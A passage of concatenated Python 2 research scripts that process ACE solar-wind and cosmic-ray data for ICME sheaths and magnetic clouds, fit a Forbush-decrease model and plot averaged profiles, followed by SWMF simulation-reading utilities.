#++++++++++++++++++++++++++++++++++++++++++++++++++++
fname_sh = dir_inp_sh + '/%s_CRs.txt' % fname_inp
fname_mc = dir_inp_mc + '/%s_CRs.txt' % fname_inp
cr.sh.data = np.loadtxt(fname_sh).T
cr.mc.data = np.loadtxt(fname_mc).T
cr.sh.t, cr.sh.avr = cr.sh.data[0], cr.sh.data[2]
cr.mc.t, cr.mc.avr = cr.mc.data[0], cr.mc.data[2]
self.sh = sh
self.mc = mc
self.cr = cr
return sh, mc, cr
"""
vlo, vhi = 550.0, 3000.0 #100.0, 450.0 #550.0, 3000.0
dir_inp_sh = '../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_inp_mc = '../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0_vlo.%4.1f.vhi.%4.1f' % (vlo, vhi)
"""
```
#### File: n_CR/individual/mk_fig.py
```python
from pylab import *
#from load_data import sh, mc, cr
import func_data as fd
import share.funcs as ff
#import CythonSrc.funcs as ff
import matplotlib.patches as patches
import matplotlib.transforms as transforms
from os import environ as env
from os.path import isfile, isdir
from h5py import File as h5
#++++++++++++++++++++++++++++++++++++++++++++++++++++
class Lim:
def __init__(self, min_, max_, n):
self.min = min_
self.max = max_
self.n = n
def delta(self):
return (self.max-self.min) / (1.0*self.n)
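# e.g. Lim(0., 10., n=20).delta() == 0.5 -- the grid step used below to build
# the brute-force slice ranges (illustrative values only).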
dir_inp_sh = '{dir}/sheaths.icmes/ascii/MCflag0.1.2.2H/woShiftCorr/_auger_' .format(dir=env['MEAN_PROFILES_ACE'])
dir_inp_mc = '{dir}/icmes/ascii/MCflag0.1.2.2H/woShiftCorr/_auger_' .format(dir=env['MEAN_PROFILES_ACE'])
#dir_inp_sh = '{dir}/sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_' .format(dir=env['MEAN_PROFILES_ACE'])
#dir_inp_mc = '{dir}/mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_' .format(dir=env['MEAN_PROFILES_ACE'])
fname_inp_part = 'MCflag0.1.2.2H_2before.4after_fgap0.2_WangNaN' # '_vlo.100.0.vhi.375.0_CRs.Auger_BandScals.txt'
#fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0'
#CRstr = 'CRs.Auger_BandScals'
#CRstr = 'CRs.Auger_BandMuons'
CRstr = 'CRs.Auger_scals'
mgr = fd.mgr_data(dir_inp_sh, dir_inp_mc, fname_inp_part)
#sh, mc, cr = mgr.run(vlo=100.0, vhi=375.0, CRstr=CRstr)
#sh, mc, cr = mgr.run(vlo=375.0, vhi=450.0, CRstr=CRstr)
sh, mc, cr = mgr.run(vlo=450.0, vhi=3000.0, CRstr=CRstr)
fname_fig = './_nCR_vlo.{lo:4.1f}.vhi.{hi:4.1f}_{name}.png' .format(lo=mgr.vlo, hi=mgr.vhi, name=CRstr)
fname_out = './_nCR_vlo.{lo:5.1f}.vhi.{hi:4.1f}_{name}.h5' .format(lo=mgr.vlo, hi=mgr.vhi, name=CRstr)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#-- mc:
mc.cc = (mc.t>0.0) & (mc.t<=2.0)
mc.tout = 3.0*mc.t[mc.cc]+1.0
mc.rms = mc.rmsB[mc.cc]
mc.B = mc.B[mc.cc]
cr.mc.crs = cr.mc.avr[mc.cc]
#-- sheath
sh.cc = sh.t<1.0
sh.tout = sh.t[sh.cc]
sh.rms = sh.rmsB[sh.cc]
sh.B = sh.B[sh.cc]
cr.sh.crs = cr.sh.avr[sh.cc]
tpre = 0.0 #-1.0 # time before which data is used to estimate the quiet-SW rms
rms_o = np.mean(sh.rms[sh.t<tpre]) #0.06 #0.025 #np.mean(sh.rms[sh.t<-1.0]) #0.03
t = np.concatenate([sh.tout, mc.tout])
rms = np.concatenate([sh.rms, mc.rms])
B = np.concatenate([sh.B, mc.B])
crs = np.concatenate([cr.sh.crs, cr.mc.crs])
org_t = t.copy()
org_crs = crs.copy()
t, rms, crs, B = t[t>=0.0], rms[t>=0.0], crs[t>=0.0], B[t>=0.0]
dt = t[1:-1] - t[0:-2]
cte = 0.0
#--- 'fc' is the piecewise version of 'rms'
cc = ((rms-rms_o)>=0.0) & (t<5.0)
fc = np.zeros(rms.size)
fc[cc] = (rms-rms_o)[cc]
b = B
#++++++++++++++++++++++++++++++++++++++++++++++++ fit
#--- seeds (initial guesses)
tau_, q_, off_ = 5., -6., 0.1 #2.0, -400.0
bp_, bo_ = -0.1, 10.0
#--- parameter boundaries && number of evaluations
nbin = 20 #5
tau = Lim(0.2, 10., n=nbin)
q = Lim(-20., -0.1, n=nbin)
off = Lim(0., 1., n=nbin)
bp = Lim(-1., 0., n=nbin)
bo = Lim(0., 20., n=nbin)
#--- slice object
rranges = (
slice(tau.min, tau.max, tau.delta()),
slice(q.min, q.max, q.delta()),
slice(off.min, off.max, off.delta()),
slice(bp.min, bp.max, bp.delta()),
slice(bo.min, bo.max, bo.delta()),
)
#--- start && run the fitter
data = np.array([t, fc, crs, b])
fit = ff.fit_forbush(data, [tau_, q_, off_, bp_, bo_])
#fit.make_fit_brute(rranges)
#print fit.par
fit.par = {}
#--- fit parameters in HDF5 (read back here; the writing lines are commented out)
fo = h5(fname_out, 'r')
for pname in fo.keys():
if pname=='grids':
continue
fit.par[pname] = fo[pname].value
#fo[pname] = fit.par[pname]
print fit.par
#--- saving of the exploration grid (currently disabled)
#fo['grids/tau'] = [tau.min, tau.max, tau.delta(), tau.n]
#fo['grids/q'] = [q.min, q.max, q.delta(), q.n]
#fo['grids/off'] = [off.min, off.max, off.delta(), off.n]
#fo['grids/bp'] = [bp.min, bp.max, bp.delta(), bp.n]
#fo['grids/bo'] = [bo.min, bo.max, bo.delta(), bo.n]
#------------------
#++++++++++++++++++++++++++++++++++++++++++++++++ figure
fig = figure(1, figsize=(6,3.))
ax = fig.add_subplot(111)
ncr = ff.nCR2([t, fc, b], **fit.par)
sqr = np.nanmean(np.square(crs - ncr))
#--- left plot
ax.plot(org_t, org_crs, '-o', c='gray', ms=3)
ax.plot(t, ncr, '-', c='red', lw=5, alpha=0.8, label='$\\tau = {tau:3.3g}$'.format(**fit.par))
#++++ sheath region (orange)
trans = transforms.blended_transform_factory(ax.transData, ax.transAxes)
rect1 = patches.Rectangle((0., 0.), width=1, height=1,
transform=trans, color='orange',
alpha=0.3)
ax.add_patch(rect1)
#++++ MC region (blue)
trans = transforms.blended_transform_factory(ax.transData, ax.transAxes)
rect1 = patches.Rectangle((1., 0.), width=3, height=1,
transform=trans, color='blue',
alpha=0.3)
ax.add_patch(rect1)
ax.plot(t, crs, '-o', c='k', ms=3)
#ax.axhline(y=0.0, c='g')
ax.grid()
ax.set_xlabel('time normalized to sheath/MC passage [1]', fontsize=14)
ax.set_ylabel('$n_{CR}$ [%]', fontsize=21)
ax.set_ylim(-1., 0.5)
savefig(fname_fig, dpi=135, bbox_inches='tight')
print " ---> generamos: " + fname_fig
close()
#EOF
```
#### File: n_CR/Vmc_lo/load_Vsw.py
```python
import numpy as np
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class gral():
def __init__(self):
self.name = ''
sh, mc = gral(), gral()
cr = gral()
cr.sh, cr.mc = gral(), gral()
vlo, vhi = 550.0, 3000.0 #550., 3000. #100.0, 450.0 #550.0, 3000.0
dir_inp_sh = '../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_inp_mc = '../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0_vlo.%4.1f.vhi.%4.1f' % (vlo, vhi)
fname_sh = dir_inp_sh + '/%s_V.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_V.txt' % fname_inp_part
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.avr = sh.data[0], sh.data[2]
mc.t, mc.avr = mc.data[0], mc.data[2]
#++++++++++++++++++++++++++++++++++++++++++++++++++++
fname_sh = dir_inp_sh + '/%s_CRs.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_CRs.txt' % fname_inp_part
cr.sh.data = np.loadtxt(fname_sh).T
cr.mc.data = np.loadtxt(fname_mc).T
cr.sh.t, cr.sh.avr = cr.sh.data[0], cr.sh.data[2]
cr.mc.t, cr.mc.avr = cr.mc.data[0], cr.mc.data[2]
```
#### File: mcs/src/bonitos.py
```python
import os
from rebineo import *
import matplotlib.patches as patches
import matplotlib.transforms as transforms
import console_colors as ccl
def makefig(medVAR, avrVAR, stdVAR, nVAR, tnorm,
dTday, SUBTITLE, YLIMS, YLAB, fname_fig, varname):
fig = figure(1, figsize=(13, 6))
ax = fig.add_subplot(111)
if varname=='Temp':
avrVAR *= 1e-4
medVAR *= 1e-4
stdVAR *= 1e-4
YLIMS[0] *= 1e-4
YLIMS[1] *= 1e-4
YLAB += ' $\\times$ 10$^4$'
ax.plot(tnorm, avrVAR, 'o-', c='black', markersize=5, label='mean')
ax.plot(tnorm, medVAR, 'o-', c='red', alpha=.8, markersize=5, markeredgecolor='none', label='median')
inf = avrVAR + stdVAR/sqrt(nVAR)
sup = avrVAR - stdVAR/sqrt(nVAR)
ax.fill_between(tnorm, inf, sup, facecolor='gray', alpha=0.5)
trans = transforms.blended_transform_factory(
ax.transData, ax.transAxes)
rect1 = patches.Rectangle((0., 0.), width=1.0, height=1,
transform=trans, color='blue',
alpha=0.3)
ax.add_patch(rect1)
    if YLAB=='$\\beta$ [1]':
ax.set_yscale('log')
else:
ax.set_yscale('linear')
ax.legend(loc='upper right', fontsize=20)
ax.grid()
ax.set_ylim(YLIMS)
TITLE = SUBTITLE;
LABSIZE = 22
ax.set_title(TITLE, fontsize=25)
ax.set_xlabel('time normalized to MC passage time [1]', fontsize=LABSIZE)
ax.set_ylabel(YLAB, fontsize=LABSIZE)
ax.tick_params(labelsize=20)
savefig(fname_fig, format='png', dpi=180, bbox_inches='tight')
close()
def wangflag(ThetaThres):
if ThetaThres<0:
return 'NaN'
else:
return str(ThetaThres)
#-------------------- for the figures:
Nsh = dVARS[0][0]
WangFlag = 'NaN'#wangflag(ThetaThres)
# general prefix for the figure names:
if CorrShift:
prexShift = 'wShiftCorr'
else:
prexShift = 'woShiftCorr'
DIR_FIGS = '../plots/MCflag%s/%s/bonito' % (MCwant['alias'], prexShift)
DIR_ASCII = '../ascii/MCflag%s/%s/bonito' % (MCwant['alias'], prexShift)
try:
os.system('mkdir -p %s' % DIR_FIGS)
os.system('mkdir -p %s' % DIR_ASCII)
print ccl.On + " -------> creando: %s" % DIR_FIGS + ccl.W
print ccl.On + " -------> creando: %s" % DIR_ASCII + ccl.W
except:
print ccl.On + " Ya existe: %s" %DIR_FIGS + ccl.W
print ccl.On + " Ya existe: %s" %DIR_ASCII + ccl.W
FNAMEs = 'MCflag%s_%dbefore.%dafter_Wang%s_fgap%1.1f' % (MCwant['alias'], nbefore, nafter, WangFlag, fgap)
FNAME_ASCII = '%s/%s' % (DIR_ASCII, FNAMEs)
FNAME_FIGS = '%s/%s' % (DIR_FIGS, FNAMEs)
#----------------------------------------------------------------------------------------------------
for i in range(nvars):
fname_fig = '%s_%s.png' % (FNAME_FIGS, VARS[i][1])
print ccl.Rn+ " ------> %s" % fname_fig
varname = VARS[i][1]
ylims = VARS[i][2]
ylabel = VARS[i][3]
mediana = dVARS[i][4]
average = dVARS[i][3]
std_err = dVARS[i][5]
    nValues = dVARS[i][6] # number of good values contributing data
binsPerTimeUnit = nbin/(1+nbefore+nafter)
SUBTITLE = '# events with >80%% of data: %d' % (nEnough[i])
makefig(mediana, average, std_err, nValues, tnorm,
dTday, SUBTITLE, ylims, ylabel, fname_fig, varname)
fdataout = '%s_%s.txt' % (FNAME_ASCII, varname)
dataout = array([tnorm, mediana, average, std_err, nValues])
print " ------> %s\n" % fdataout + ccl.W
savetxt(fdataout, dataout.T, fmt='%12.5f')
##
```
#### File: sheaths.paper/src/together2_global.py
```python
from pylab import *
import numpy as np
import console_colors as ccl
from scipy.io.netcdf import netcdf_file
import os, sys
import matplotlib.patches as patches
import matplotlib.transforms as transforms
from numpy import array
from matplotlib.gridspec import GridSpec
import matplotlib.pyplot as plt
class gral:
def __init__(self):
self.name='name'
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def makefig(ax, mc, sh, TEXT, TEXT_LOC, YLIMS, varname):
LW = 0.3 # linewidth
MS = 1.5
    fmc,fsh = 3.0, 1.0 # time scalings of the MC and sheath segments
if(varname == 'Temp'):
mc.med /= 1.0e4; sh.med /= 1.0e4
mc.avr /= 1.0e4; sh.avr /= 1.0e4
mc.std_err /= 1.0e4; sh.std_err /= 1.0e4
YLIMS[0] /= 1.0e4; YLIMS[1] /= 1.0e4
TEXT_LOC['mc'][1] /= 1.0e4
TEXT_LOC['sh'][1] /= 1.0e4
    # MC curves
time = fsh+fmc*mc.tnorm
cc = time>=fsh
ax.plot(time[cc], mc.avr[cc], 'o-', color='black', markersize=MS, label='mean', lw=LW)
ax.plot(time[cc], mc.med[cc], 'o-', color='red', alpha=.8, markersize=MS, markeredgecolor='none', label='median', lw=LW)
    # MC error band
inf = mc.avr + mc.std_err/np.sqrt(mc.nValues)
sup = mc.avr - mc.std_err/np.sqrt(mc.nValues)
ax.fill_between(time[cc], inf[cc], sup[cc], facecolor='gray', alpha=0.5)
trans = transforms.blended_transform_factory(
ax.transData, ax.transAxes)
rect1 = patches.Rectangle((fsh, 0.), width=fmc, height=1,
transform=trans, color='blue',
alpha=0.3)
ax.add_patch(rect1)
    # sheath curves
time = fsh*sh.tnorm
cc = time<=fsh
ax.plot(time[cc], sh.avr[cc], 'o-', color='black', markersize=MS, lw=LW)
ax.plot(time[cc], sh.med[cc], 'o-', color='red', alpha=.8, markersize=MS, markeredgecolor='none', lw=LW)
    # sheath error band
inf = sh.avr + sh.std_err/np.sqrt(sh.nValues)
sup = sh.avr - sh.std_err/np.sqrt(sh.nValues)
ax.fill_between(time[cc], inf[cc], sup[cc], facecolor='gray', alpha=0.5)
#trans = transforms.blended_transform_factory(
# ax.transData, ax.transAxes)
rect1 = patches.Rectangle((0., 0.), width=fsh, height=1,
transform=trans, color='orange',
alpha=0.3)
ax.add_patch(rect1)
#ax.legend(loc='best', fontsize=10)
ax.tick_params(labelsize=10)
ax.grid()
ax.set_xlim(-2.0, 7.0)
ax.set_ylim(YLIMS)
ax.text(TEXT_LOC['mc'][0], TEXT_LOC['mc'][1], TEXT['mc'], fontsize=7.5)
ax.text(TEXT_LOC['sh'][0], TEXT_LOC['sh'][1], TEXT['sh'], fontsize=7.5)
if(varname in ('beta','Temp', 'rmsB', 'rmsBoB')):
ax.set_yscale('log')
else:
ax.set_yscale('linear')
return ax
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
stf = {}
stf['B'] = {
'label': 'B [nT]',
'ylims': [4., 17.],
'text_loc': {'mc':[4.5, 12.0], 'sh':[-1.95, 12.0]}
}
stf['V'] = {
'label': 'V [km/s]',
'ylims': [400., 580.],
'text_loc': {'mc':[4.5, 410.0], 'sh':[-1.95, 520.0]}
}
stf['rmsBoB'] = {
'label': 'rmsBoB [1]',
'ylims': [0.01, 0.2],
'text_loc': {'mc':[4.5, 0.020], 'sh':[-1.95, 0.02]}
}
stf['rmsB'] = {
'label': 'rmsB [nT]',
'ylims': [0.1, 2.0],
'text_loc': {'mc':[4.5, 0.8], 'sh':[-1.95, 1.0]},
}
stf['beta'] = {
'label': '$\\beta$ [1]',
'ylims': [0.1, 6.0],
'text_loc': {'mc':[4.5, 0.2], 'sh':[-1.95, 0.2]}
}
stf['Pcc'] = {
'label': '$n_p$ [$cm^{-3}$]',
'ylims': [2, 20],
'text_loc': {'mc':[4.5, 11], 'sh':[-1.95, 14.0]}
}
stf['Temp'] = {
'label': 'Tp ($\\times 10^4$) [K]',
'ylims': [1e4, 33e4],
'text_loc': {'mc':[4.5, 2.0e4], 'sh':[-1.95, 20.0e4]}
}
stf['AlphaRatio'] = {
'label': 'alpha ratio [1]',
'ylims': [0.02, 0.09],
'text_loc': {'mc':[4.5, 0.022], 'sh':[-1.95, 0.07]}
}
stf['CRs'] = {
'label': '$n_{GCR}$ [%]',
'ylims': [-5.0, 1.0],
'text_loc': {'mc':[4.5, -4.0], 'sh':[-1.95, -2.5]}
}
#dir_figs = '../figs'
#dir_inp_mc = '../../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
#dir_inp_sh = '../../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_figs = sys.argv[1]
dir_inp_sh = os.environ['LEFT']
dir_inp_mc = os.environ['RIGHT']
fname_fig = '%s/figs_all.global.png' % dir_figs
#vlo = [100.0, 450.0, 550.0]
#vhi = [450.0, 550.0, 3000.0]
#nvars = len(stf.keys())
print " input: "
print " %s " % dir_inp_mc
print " %s \n" % dir_inp_sh
#print " vlo, vhi: ", (vlo, vhi), '\n'
#print " nvars: ", nvars
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
i=2
#fig = figure(1, figsize=(12, 15))
f = plt.figure(1, figsize=(8, 9))
#nr = 1 # scale for row size
gs = GridSpec(nrows=4, ncols=2)
gs.update(left=0.1, right=0.98, hspace=0.13, wspace=0.25)
fname_inp = 'MCflag2_2before.4after_fgap0.2_Wang90.0'
fname_inp_nro_mc = dir_inp_mc + '/n.events_' + fname_inp + '.txt'
fname_inp_nro_sh = dir_inp_sh + '/n.events_' + fname_inp + '.txt'
VARNAMEs = ['B', 'V', 'Pcc', 'Temp', 'beta', 'rmsBoB', 'CRs', 'rmsB']
nvars = len(VARNAMEs)
for i, varname in zip(range(nvars), VARNAMEs):
TEXT = {}
fnro_mc = open(fname_inp_nro_mc, 'r')
fnro_sh = open(fname_inp_nro_sh, 'r')
for lmc, lsh in zip(fnro_mc, fnro_sh):
l_mc = lmc.split()
l_sh = lsh.split()
        if varname==l_mc[0]: # variable name
fnro_mc.close(); fnro_sh.close()
break
nr = int(1.*i/2) # row
nc = i%2 # column
ax = plt.subplot(gs[nr, nc])
    # Nfinal: events w/ 80% of data (this is the count we care about)
Nfinal_mc, Nfinal_sh = int(l_mc[1]), int(l_sh[1])
print " (row, col)=(%d, %d) ---> " % (nr, nc),
print " %s"%varname, ' Nfinal_mc:%d' % Nfinal_mc, 'Nfinal_sh:%d' % Nfinal_sh
mc, sh = gral(), gral()
fname_inp_mc = dir_inp_mc + '/' + fname_inp + '_%s.txt' % varname
fname_inp_sh = dir_inp_sh + '/' + fname_inp + '_%s.txt' % varname
mc.tnorm, mc.med, mc.avr, mc.std_err, mc.nValues = np.loadtxt(fname_inp_mc).T
sh.tnorm, sh.med, sh.avr, sh.std_err, sh.nValues = np.loadtxt(fname_inp_sh).T
    # number of events with more than 80% non-gap data
TEXT['mc'] = 'events: %d' % Nfinal_mc
TEXT['sh'] = 'events: %d' % Nfinal_sh
TEXT_LOC = stf[varname]['text_loc'] #1.7, 12.0
ylims = stf[varname]['ylims'] #[4., 17.]
ylabel = stf[varname]['label'] #'B [nT]'
makefig(ax, mc, sh, TEXT, TEXT_LOC, ylims, varname)
# labels
ax.set_ylabel(ylabel, fontsize=12)
if nr==3:
ax.set_xlabel('time normalized to\nsheath/MC passage [1]', fontsize=11)
else:
ax.set_xlabel('')
ax.xaxis.set_ticklabels([])
#fig.tight_layout()
savefig(fname_fig, dpi=150, bbox_inches='tight')
close()
print "\n output en:\n %s\n" % fname_fig
#EOF
```
#### File: src/forbush/c_rebineo_forbush.py
```python
from pylab import *
from numpy import *
from scipy.io.netcdf import netcdf_file
from datetime import datetime, time, timedelta
#------------ shared libraries:
import sys
sys.path.append('../../shared_lib')
from shared_funcs import * #c_funcs import *
#------------------------------
#from read_NewTable import tshck, tini_icme, tend_icme, tini_mc, tend_mc, n_icmes, MCsig
from ShiftTimes import *
import numpy as np
from z_expansion_gulisano import z as z_exp
import console_colors as ccl
import read_NewTable as tb
#---- input settings
day = 86400.
fnames = {}
fnames['ACE'] = '../../../../../../../data_ace/64sec_mag-swepam/ace.1998-2014.nc'
fnames['table_richardson'] = '../../../../data_317events_iii.nc'
#---- output directories
dirs = {}
dirs['dir_plots'] = '../plots'
dirs['dir_ascii'] = '../ascii'
#-------------------------------------------------------------
#------- select MCs by their catalog label (lepping=2, etc.)
#MCwant = {'flags': ('0', '1', '2', '2H'),
#          'alias': '0.1.2.2H'} # used to tag the figure names/paths
#MCwant = {'flags': ('1', '2', '2H'),
#          'alias': '1.2.2H'} # used to tag the figure names/paths
#MCwant = {'flags': ('2', '2H'),
#          'alias': '2.2H'} # used to tag the figure names/paths
MCwant = {'flags': ('2',),
          'alias': '2'} # used to tag the figure names/paths
FILTER = {}
FILTER['Mcmultiple'] = False # True to include multi-MC events
FILTER['wang'] = True
FILTER['vsw_filter'] = True
FILTER['z_filter_on'] = False
FILTER['CorrShift'] = True
FILTER['MCwant'] = MCwant
CUTS = {}
CUTS['ThetaThres'] = 90.0
CUTS['dTday'] = 0.0
CUTS['v_lo'] = 550.0
CUTS['v_hi'] = 3000.0
CUTS['z_lo'] = -50.0
CUTS['z_hi'] = 0.65
nBin = {}
nBin['before'] = 2
nBin['after'] = 4
nBin['bins_per_utime'] = 50 # bins per unit of time
nBin['total'] = (1+nBin['before']+nBin['after'])*nBin['bins_per_utime']
fgap = 0.2
class boundaries:
def __init__(self):
name = 'name'
bounds = boundaries()
bounds.tini = tb.tshck #tb.tini_mc #tb.tshck
bounds.tend = tb.tini_mc #tb.tend_mc #tb.tini_mc
FILTER['vsw_filter'] = False
CUTS['v_lo'], CUTS['v_hi'] = 550.0, 3000.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
FILTER['vsw_filter'] = True
CUTS['v_lo'], CUTS['v_hi'] = 100.0, 450.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
FILTER['vsw_filter'] = True
CUTS['v_lo'], CUTS['v_hi'] = 450.0, 550.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
FILTER['vsw_filter'] = True
CUTS['v_lo'], CUTS['v_hi'] = 550.0, 3000.0
emgr = events_mgr(dirs, fnames, FILTER, CUTS, bounds, nBin, fgap, tb, z_exp)
emgr.run_all()
##
``` |
{
"source": "jimsrc/swmf_figs",
"score": 2
} |
#### File: swmf_figs/shared/funcs.py
```python
import numpy as np
#from numpy import sin, cos, array, sqrt
import logging, argparse, glob
import h5py, copy
#---- system
from subprocess import Popen, PIPE, STDOUT
import re
#---- graphics
from pylab import figure, close, show
from matplotlib import cm
from matplotlib.colors import LogNorm, Normalize
from mpl_toolkits.mplot3d import Axes3D # necessary for projection='3d' in add_subplot()
#---- polar plots (w/ partial limits)
import mpl_toolkits.axisartist.floating_axes as floating_axes
import mpl_toolkits.axisartist.angle_helper as angle_helper
from matplotlib.projections import PolarAxes
from mpl_toolkits.axisartist.grid_finder import (FixedLocator, MaxNLocator,
DictFormatter)
import Tkinter
#++++++ constants
r2d = 180./np.pi
np.set_printoptions(precision=2, linewidth=230)
#++++++ logging
logger = logging.getLogger()
logger.setLevel(logging.DEBUG) # 'DEBUG' by default
ch = logging.StreamHandler()
# logging setup
formatter = logging.Formatter("# %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
def equi_list(flist, npart):
"""
    returns the sizes of the most equi-partitioned split
    of the file list 'flist' into 'npart' parts
"""
nf = len(flist)
nf_part = np.zeros(npart, dtype=np.int)
resid = np.mod(nf, npart)
for i in range(npart-resid):
nf_part[i] = nf/npart
# last positions where I put residuals
last = np.arange(start=-1,stop=-resid-1,step=-1)
for i in last:
nf_part[i] = nf/npart + 1
assert np.sum(nf_part)==nf, \
" --> somethng went wrong! :/ "
return nf_part
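# e.g. equi_list(range(10), 3) -> array([3, 3, 4]): the sizes of the three
# most even parts (illustrative call).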
def equi_days(dini, dend, n):
"""
returns most equi-partitioned tuple of number
of days between date-objects 'dini' and 'dend'
"""
days = (dend - dini).days
days_part = np.zeros(n, dtype=np.int)
resid = np.mod(days, n)
for i in range(n-resid):
days_part[i] = days/n
# last positions where I put residuals
last = np.arange(start=-1,stop=-resid-1,step=-1)
for i in last:
days_part[i] = days/n+1
assert np.sum(days_part)==days, \
" --> somethng went wrong! :/ "
return days_part
#+++++++++++++++++++++++++++++++++++
def calc_phi(_x, _y):
assert (_x!=0) or (_y!=0.), "\n [-] singularity!\n"
if ((_x==0.) & (_y>0.)):
return 0.5*np.pi
elif ((_x==0.) & (_y<0.)):
return 1.5*np.pi
elif (_x<0.):
return np.pi + np.arctan(_y/_x)
elif ((_x>0.) & (_y<0.)):
return 2.*np.pi + np.arctan(_y/_x)
else:
return np.arctan(_y/_x)
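# e.g. calc_phi(1., 1.) = pi/4, calc_phi(-1., 1.) = 3*pi/4 and
# calc_phi(1., -1.) = 7*pi/4; the returned azimuth always lies in [0, 2*pi).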
#@profile
def read_data(fnm, vnames):
"""
fnm : input filename
vnames : variable names
odata : output data (processed from ASCII data)
"""
print "\n [+] reading data...\n"
fformat = file_format(fnm)
vdict = {}
if fformat=='ascii':
inp = np.loadtxt(fnm, unpack=True, skiprows=5)
# make sure we match the number of fields in the ASCII file
assert len(inp)==(3 + len(vnames)), \
'\n [-] vnames doesn\'t match the number of fields in the ASCII file!\n'
# get the coordinates
x, y, z = inp[:3]
# get output variables from simulation
for nm, _inm in zip(vnames, range(len(vnames))):
vdict[nm] = inp[3+_inm]
print ' [*] read ok.\n'
ndata = x.size
r, th, ph = np.zeros((3,ndata), dtype=np.float)
r[:] = np.sqrt(x**2 + y**2 + z**2)
th[:] = np.arctan(z / np.sqrt(x**2 + y**2))
for i in range(ndata):
#r[i] = np.sqrt(x[i]**2 + y[i]**2 + z[i]**2)
#th[i] = np.arctan(z[i]/)
ph[i] = calc_phi(x[i], y[i]) # [rad]
elif fformat=='hdf5':
logger.info(' [*] reading an HDF5 file...')
f5 = h5py.File(fnm, 'r')
r = f5['coords/r'][...]
ph = f5['coords/ph'][...]
th = f5['coords/th'][...]
for nm in f5['data'].keys():
# don't read variables that we did not ask for.
            if nm not in vnames: continue
assert nm not in vdict.keys(),\
'\n [-] vdict already has the key! (%s)\n' % nm
logger.debug(' [*] reading variable: '+nm)
vdict[nm] = f5['data/'+nm][...]
assert len(vdict.keys()) > 0,\
' [-] we did not grab any variable from:\n %r\n by using the parsed list:\n %r\n'% (f5.keys(), vnames)
f5.close()
elif fformat=='binary': # IDL binary
import spacepy.pybats as pb
# NOTE: SpacePy knows how to handle IDL binary!
fpb = pb.IdlFile(fnm, format=fformat)
# get coordinates
x, y, z = fpb['x'][...], fpb['y'][...], fpb['z'][...]
# get output variables from simulation
#fkeys_low = [ _k.lower() for _k in fpb.keys() ]
assert all([_vnm in fpb.keys() for _vnm in vnames]), \
"""
one of these variables:
%r
is/are not included in those of the input file:
%r
""" % (vnames, fpb.keys())
for nm in vnames:
vdict[nm] = fpb[nm][...]
print ' [*] read ok.\n'
ndata = x.size
r, th, ph = np.zeros((3,ndata), dtype=np.float)
r[:] = np.sqrt(x**2 + y**2 + z**2)
th[:] = np.arctan(z / np.sqrt(x**2 + y**2))
ph[:] = [ calc_phi(x[i], y[i]) for i in range(ndata) ]
assert len(vdict.keys()) > 0,\
' [-] we did not grab any variable from:\n %r\n by using the parsed list:\n %r\n'% (fpb.keys(), vnames)
# TODO: need to close 'fpb'?
del fpb
else:
raise SystemExit('\n [-] wrong file format: %r\n'%fformat)
return r, ph, th, vdict, fformat
def ib_to_ind(ic, ib, coords, nRoot, nc, nLevel):
ic_r, ic_ph, ic_th = ic
r, ph, th = coords
nc_r, nc_ph, nc_th = nc
nRootX, nRootY, nRootZ = nRoot
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
nb_r = npart_D*nRootX
nb_ph = npart_D*nRootY
nb_th = npart_D*nRootZ
_ibloc = deduce_terna(ib, nRoot, nc, nLevel)
# location of the sub-block
ib_mem_r,ib_mem_ph,ib_mem_th = _ibloc['ib_mem']
# local location in units of sub-blocks
ibb_r, ibb_ph, ibb_th = _ibloc['ibb']
# global location in units of sub-blocks
ib_r = ib_mem_r *npart_D + ibb_r
ib_ph = ib_mem_ph*npart_D + ibb_ph
ib_th = ib_mem_th*npart_D + ibb_th
# global cardinal index
ind = ic_r + ic_ph*nc_r + ic_th*(nc_r*nc_ph) +\
ib*(nc_r*nc_th*nc_ph)
ind_r = ic_r + ib_r *nc_r
ind_ph = ic_ph + ib_ph*nc_ph
ind_th = ic_th + ib_th*nc_th
# info on screen
print " block:%d/%d, %d/%d, %d/%d " %\
(ib_r, nb_r, \
ib_ph, nb_ph, \
ib_th, nb_th),
#if ib_th >= 6:
# import pdb; pdb.set_trace()
print '; cell:%d,%d,%d; ind:%06d (%d,%d,%d)' % \
(ic_r, ic_ph, ic_th, ind, ind_r, ind_ph, ind_th),
print '; (r,ph,th)=(%.2f, %.2f, %.2f)' % \
(r[ind], ph[ind]*r2d, th[ind]*r2d)
# check mem block indexes
assert ib_mem_r < nRootX
assert ib_mem_ph < nRootY
assert ib_mem_th < nRootZ
# check sub-block indexes
assert ibb_r < npart_D
assert ibb_ph < npart_D
assert ibb_th < npart_D
# check final indexes
assert ind_r < nc_r * (nRootX*npart_D)
assert ind_ph < nc_ph * (nRootY*npart_D)
assert ind_th < nc_th * (nRootZ*npart_D)
return ind, ind_r, ind_ph, ind_th
#@profile
